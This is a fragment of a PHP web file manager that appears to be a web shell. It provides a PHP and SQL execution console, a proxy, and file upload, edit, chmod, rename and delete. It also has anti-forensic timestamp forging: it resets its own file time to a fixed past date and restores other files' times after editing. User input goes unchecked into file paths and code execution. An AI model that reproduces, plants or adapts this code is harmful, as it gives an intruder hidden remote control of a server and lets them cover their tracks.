	                    cursor: pointer;
}



.folder {
         
    background-image: url("data:image/png;base64,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");

}


.file {
           
    background-image: url("data:image/png;base64,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");
}
<?=fm_home_style()?>

.img {
             
	                    background-image: 
url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII=");

}

@media screen and (max-width:720px){

  table{display:block;}

    #fm_table td{display:inline;float:left;}
    #fm_table tbody td:first-child{width:100%;padding:0;}

    #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;}
    #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;}
            
    #fm_table tr{display:block;float:left;clear:left;width:100%;}
	                    #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;}

	                    #header_table table td {display:inline;float:left;}
}
</style>
        
</head>
            
<body>
<?php

$url_inc = '?fm=true';
if (isset($_POST['sqlrun'])&&!empty($fm_config['enable_sql_console'])){
	                    $res = empty($_POST['sql']) ? '' : $_POST['sql'];

	                    $res_lng = 'sql';

} elseif (isset($_POST['phprun'])&&!empty($fm_config['enable_php_console'])){
	                    $res = empty($_POST['php']) ? '' : $_POST['php'];

	                    $res_lng = 'php';
} 
        
if (isset($_GET['fm_settings'])) {
           
	                    echo ' 
             
<table class="whole">
                
<form method="post" action="">
                 
<tr><th colspan="2">'.__('File manager').' - '.__('Settings').'</th></tr>
           
'.(empty($msg_mx)?'':'<tr><td class="row2" colspan="2">'.$msg_mx.'</td></tr>').'

'.fm_config_checkbox_row(__('Show size of the folder'),'show_dir_size').'

'.fm_config_checkbox_row(__('Show').' '.__('pictures'),'show_img').'

'.fm_config_checkbox_row(__('Show').' '.__('Make directory'),'make_directory').'

'.fm_config_checkbox_row(__('Show').' '.__('New file'),'new_file').'
            
'.fm_config_checkbox_row(__('Show').' '.__('Upload'),'upload_file').'

'.fm_config_checkbox_row(__('Show').' PHP version','show_php_ver').'

'.fm_config_checkbox_row(__('Show').' PHP ini','show_php_ini').'

'.fm_config_checkbox_row(__('Show').' '.__('Generation time'),'show_gt').'

'.fm_config_checkbox_row(__('Show').' xls','show_xls').'
                 
'.fm_config_checkbox_row(__('Show').' PHP '.__('Console'),'enable_php_console').'

'.fm_config_checkbox_row(__('Show').' SQL '.__('Console'),'enable_sql_console').'
<tr><td class="row1"><input name="fm_config[sql_server]" value="'.$fm_config['sql_server'].'" type="text"></td><td class="row2 whole">SQL server</td></tr>

<tr><td class="row1"><input name="fm_config[sql_username]" value="'.$fm_config['sql_username'].'" type="text"></td><td class="row2 whole">SQL user</td></tr>
<tr><td class="row1"><input name="fm_config[sql_password]" value="'.$fm_config['sql_password'].'" type="text"></td><td class="row2 whole">SQL password</td></tr>
               
<tr><td class="row1"><input name="fm_config[sql_db]" value="'.$fm_config['sql_db'].'" type="text"></td><td class="row2 whole">SQL DB</td></tr>
                 
'.fm_config_checkbox_row(__('Show').' Proxy','enable_proxy').'
             
'.fm_config_checkbox_row(__('Show').' phpinfo()','show_phpinfo').'

'.fm_config_checkbox_row(__('Show').' '.__('Settings'),'fm_settings').'
                   
'.fm_config_checkbox_row(__('Restore file time after editing'),'restore_time').'

'.fm_config_checkbox_row(__('File manager').': '.__('Restore file time after editing'),'fm_restore_time').'
<tr><td class="row3"><a href="'.fm_url().'?fm_settings=true&fm_config_delete=true">'.__('Reset settings').'</a></td><td class="row3"><input type="submit" value="'.__('Save').'" name="fm_config[fm_set_submit]"></td></tr>

</form>
</table>

<table>

<form method="post" action="">
<tr><th colspan="2">'.__('Settings').' - '.__('Authorization').'</th></tr>

<tr><td class="row1"><input name="fm_login[authorize]" value="1" '.($auth_ok['authorize']?'checked':'').' type="checkbox" id="auth"></td><td class="row2 whole"><label for="auth">'.__('Authorization').'</label></td></tr>

<tr><td class="row1"><input name="fm_login[login]" value="'.$auth_ok['login'].'" type="text"></td><td class="row2 whole">'.__('Login').'</td></tr>
<tr><td class="row1"><input name="fm_login[password]" value="'.$auth_ok['password'].'" type="text"></td><td class="row2 whole">'.__('Password').'</td></tr>
<tr><td class="row1"><input name="fm_login[cookie_name]" value="'.$auth_ok['cookie_name'].'" type="text"></td><td class="row2 whole">'.__('Cookie').'</td></tr>
                   
<tr><td class="row1"><input name="fm_login[days_authorization]" value="'.$auth_ok['days_authorization'].'" type="text"></td><td class="row2 whole">'.__('Days').'</td></tr>

<tr><td class="row1"><textarea name="fm_login[script]" cols="35" rows="7" class="textarea_input" id="auth_script">'.$auth_ok['script'].'</textarea></td><td class="row2 whole">'.__('Script').'</td></tr>

<tr><td colspan="2" class="row3"><input type="submit" value="'.__('Save').'" ></td></tr>
</form>

</table>';
echo fm_tpl_form('php'),fm_tpl_form('sql');

} elseif (isset($proxy_form)) {

	                    die($proxy_form);

} elseif (isset($res_lng)) {	                    

?>

<table class="whole">
             
<tr>
    <th><?=__('File manager').' - '.$path?></th>

</tr>
<tr>

    <td class="row2"><table><tr><td><h2><?=strtoupper($res_lng)?> <?=__('Console')?><?php

	                    if($res_lng=='sql') echo ' - Database: '.$fm_config['sql_db'].'</h2></td><td>'.fm_run_input('php');

	                    else echo '</h2></td><td>'.fm_run_input('sql');
	                    ?></td></tr></table></td>

</tr>
                  
<tr>
    <td class="row1">
	                    	                    <a href="<?=$url_inc.'&path=' . $path;?>"><?=__('Back')?></a>

	                    	                    <form action="" method="POST" name="console">
	                    	                    <textarea name="<?=$res_lng?>" cols="80" rows="10" style="width: 90%"><?=$res?></textarea><br/>
	                    	                    <input type="reset" value="<?=__('Reset')?>">

	                    	                    <input type="submit" value="<?=__('Submit')?>" name="<?=$res_lng?>run">
                    
<?php

$str_tmpl = $res_lng.'_templates';

$tmpl = !empty($$str_tmpl) ? json_decode($$str_tmpl,true) : '';

if (!empty($tmpl)){
             
	                    $active = isset($_POST[$res_lng.'_tpl']) ? $_POST[$res_lng.'_tpl'] : '';

	                    $select = '<select name="'.$res_lng.'_tpl" title="'.__('Template').'" onchange="if (this.value!=-1) document.forms[\'console\'].elements[\''.$res_lng.'\'].value = this.options[selectedIndex].value; else document.forms[\'console\'].elements[\''.$res_lng.'\'].value =\'\';" >'."\n";
	                    $select .= '<option value="-1">' . __('Select') . "</option>\n";
                   
	                    foreach ($tmpl as $key=>$value){
            
	                    	                    $select.='<option value="'.$value.'" '.((!empty($value)&&($value==$active))?'selected':'').' >'.__($key)."</option>\n";
	                    }

	                    $select .= "</select>\n";

	                    echo $select;

}

?>

	                    	                    </form>
	                    </td>

</tr>

</table>

<?php

	                    if (!empty($res)) {
           
	                    	                    $fun='fm_'.$res_lng;

	                    	                    echo '<h3>'.strtoupper($res_lng).' '.__('Result').'</h3><pre>'.$fun($res).'</pre>';
             
	                    }
             
} elseif (!empty($_REQUEST['edit'])){

	                    if(!empty($_REQUEST['save'])) {

	                    	                    $fn = $path . $_REQUEST['edit'];

	                    	                    $filemtime = filemtime($fn);
                  
	                        if (file_put_contents($fn, $_REQUEST['newcontent'])) $msg_mx .= __('File updated');
	                    	                    else $msg_mx .= __('Error occurred');

	                    	                    if ($_GET['edit']==basename(__FILE__)) {
	                    	                    	                    touch(__FILE__,1415116371);
                   
	                    	                    } else {
	                    	                    	                    if (!empty($fm_config['restore_time'])) touch($fn,$filemtime);

	                    	                    }

	                    }

    $oldcontent = @file_get_contents($path . $_REQUEST['edit']);
    $editlink = $url_inc . '&edit=' . $_REQUEST['edit'] . '&path=' . $path;

    $backlink = $url_inc . '&path=' . $path;
                   
?>

<table border='0' cellspacing='0' cellpadding='1' width="100%">

<tr>

    <th><?=__('File manager').' - '.__('Edit').' - '.$path.$_REQUEST['edit']?></th>
        
</tr>
                 
<tr>
    <td class="row1">
                   
        <?=$msg_mx?>
	                    </td>
</tr>
<tr>

    <td class="row1">
        <?=fm_home()?> <a href="<?=$backlink?>"><?=__('Back')?></a>

	                    </td>

</tr>
                   
<tr>

    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$editlink?>">
            <textarea name="newcontent" id="newcontent" cols="45" rows="15" style="width:99%" spellcheck="false"><?=htmlspecialchars($oldcontent)?></textarea>
            <input type="submit" name="save" value="<?=__('Submit')?>">
                   
            <input type="submit" name="cancel" value="<?=__('Cancel')?>">

        </form>
    </td>
</tr>
</table>
                  
<?php

echo $auth_ok['script'];

} elseif(!empty($_REQUEST['rights'])){

	                    if(!empty($_REQUEST['save'])) {

	                        if(fm_chmod($path . $_REQUEST['rights'], fm_convert_rights($_REQUEST['rights_val']), @$_REQUEST['recursively']))

	                    	                    $msg_mx .= (__('File updated')); 
                   
	                    	                    else $msg_mx .= (__('Error occurred'));
         
	                    }

	                    clearstatcache();
    $oldrights = fm_rights_string($path . $_REQUEST['rights'], true);

    $link = $url_inc . '&rights=' . $_REQUEST['rights'] . '&path=' . $path;
    $backlink = $url_inc . '&path=' . $path;
              
?>
                   
<table class="whole">
<tr>

    <th><?=__('File manager').' - '.$path?></th>

</tr>
<tr>
    <td class="row1">

        <?=$msg_mx?>

	                    </td>
</tr>

<tr>

    <td class="row1">

        <a href="<?=$backlink?>"><?=__('Back')?></a>
                 
	                    </td>
                    
</tr>

<tr>
    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$link?>">
           <?=__('Rights').' - '.$_REQUEST['rights']?> <input type="text" name="rights_val" value="<?=$oldrights?>">
                
        <?php if (is_dir($path.$_REQUEST['rights'])) { ?>
            <input type="checkbox" name="recursively" value="1"> <?=__('Recursively')?><br/>
        <?php } ?>
                 
            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>

    </td>
</tr>
           
</table>
           
<?php

} elseif (!empty($_REQUEST['rename'])&&$_REQUEST['rename']<>'.') {

	                    if(!empty($_REQUEST['save'])) {

	                        rename($path . $_REQUEST['rename'], $path . $_REQUEST['newname']);
                 
	                    	                    $msg_mx .= (__('File updated'));

	                    	                    $_REQUEST['rename'] = $_REQUEST['newname'];
	                    }
         
	                    clearstatcache();

    $link = $url_inc . '&rename=' . $_REQUEST['rename'] . '&path=' . $path;
             
    $backlink = $url_inc . '&path=' . $path;


?>
<table class="whole">
<tr>

    <th><?=__('File manager').' - '.$path?></th>
            
</tr>
<tr>

    <td class="row1">
        <?=$msg_mx?>

	                    </td>
         
</tr>

<tr>

    <td class="row1">
                    
        <a href="<?=$backlink?>"><?=__('Back')?></a>
              
	                    </td>

</tr>

<tr>

    <td class="row1" align="center">

        <form name="form1" method="post" action="<?=$link?>">
            <?=__('Rename')?>: <input type="text" name="newname" value="<?=$_REQUEST['rename']?>"><br/>

            <input type="submit" name="save" value="<?=__('Submit')?>">
        </form>

    </td>

</tr>
                 
</table>
<?php

} else {
             
//Let's rock!

    $msg_mx = '';

    if(!empty($_FILES['upload'])&&!empty($fm_config['upload_file'])) {
         
        if(!empty($_FILES['upload']['name'])){
            $_FILES['upload']['name'] = str_replace('%', '', $_FILES['upload']['name']);

            if(!move_uploaded_file($_FILES['upload']['tmp_name'], $path . $_FILES['upload']['name'])){

                $msg_mx .= __('Error occurred');
              
            } else {

	                    	                    	                    	                    $msg_mx .= __('Files uploaded').': '.$_FILES['upload']['name'];

	                    	                    	                    }

        }
          
    } elseif(!empty($_REQUEST['delete'])&&$_REQUEST['delete']<>'.') {

        if(!fm_del_fileList(($path . $_REQUEST['delete']), true)) {
            $msg_mx .= __('Error occurred');

        } else {
           
	                    	                    	                    $msg_mx .= __('Deleted').' '.$_REQUEST['delete'];
	                    	                    }

